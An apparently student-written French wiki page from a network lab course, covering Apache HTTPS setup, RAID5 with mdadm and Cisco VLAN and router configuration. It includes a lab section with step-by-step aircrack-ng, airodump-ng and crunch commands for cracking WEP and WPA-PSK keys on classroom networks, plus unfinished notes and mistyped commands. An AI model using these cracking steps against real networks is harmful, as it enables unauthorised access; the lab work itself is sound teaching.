      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
